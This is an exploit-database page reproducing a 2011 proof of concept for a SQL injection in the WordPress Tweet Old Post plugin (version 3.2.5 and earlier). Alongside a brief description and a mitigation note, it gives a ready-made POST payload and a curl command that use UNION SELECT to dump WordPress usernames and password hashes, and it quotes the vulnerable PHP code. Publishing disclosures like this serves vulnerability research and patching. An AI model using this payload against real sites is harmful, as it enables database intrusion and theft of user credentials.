header-logo
Suggest Exploit
vendor:
Tweet Old Post plugin
by:
sherl0ck_
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Tweet Old Post plugin
Affected Version From: <= 3.2.5
Affected Version To: <= 3.2.5
Patch Exists: NO
Related CWE:
CPE: a:wordpress:tweet_old_post:3.2.5
Metasploit:
Other Scripts:
Platforms Tested: WordPress (tested on version not specified)
2011

WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection

The WordPress Tweet Old Post plugin version 3.2.5 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the affected WordPress site's database.

Mitigation:

Update to the latest version of the plugin to fix the SQL Injection vulnerability. Additionally, ensure that all plugins and themes are regularly updated to minimize the risk of exploitation.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection
Vulnerability
# Date: 2011-09-05
# Author: sherl0ck_ < sherl0ck_ [at] alligatorteam [dot] org >
# Software Link: http://downloads.wordpress.org/plugin/tweet-old-post.zip
# Version: 3.2.5 (tested)

---------------
PoC (POST data)
---------------
URL:
http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts

POST Data:
delids=1&selFilter=excluded&cat=1=0) UNION ALL SELECT
USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from
wp_users#&setFilter=Filter&s=hello&chkbx=1

e.g.:
curl --cookie "[COOKIE]" --data "delids=1&selFilter=excluded&cat=1) UNION
ALL SELECT
USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from
wp_users#&setFilter=Filter&s=hello&chkbx=1"
http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts

---------------
Vulnerable code
---------------
70     if(isset($_POST["setFilter"]))
71     {
72         if($_POST["cat"] != 0)
73         {
74             $sql = $sql . " and p.ID IN ( SELECT tr.object_id FROM
".$wpdb->prefix."term_relationships AS tr INNER JOIN
".$wpdb->prefix."term_taxonomy AS tt ON tr.term_taxonomy_id = tt.ter
 m_taxonomy_id WHERE tt.taxonomy = 'category' AND tt.term_id=" .
$_POST["cat"] . ")";
75             $cat_filter = $_POST["cat"];

Navigation

Suggest Exploit

Services By CQR

cqrsecured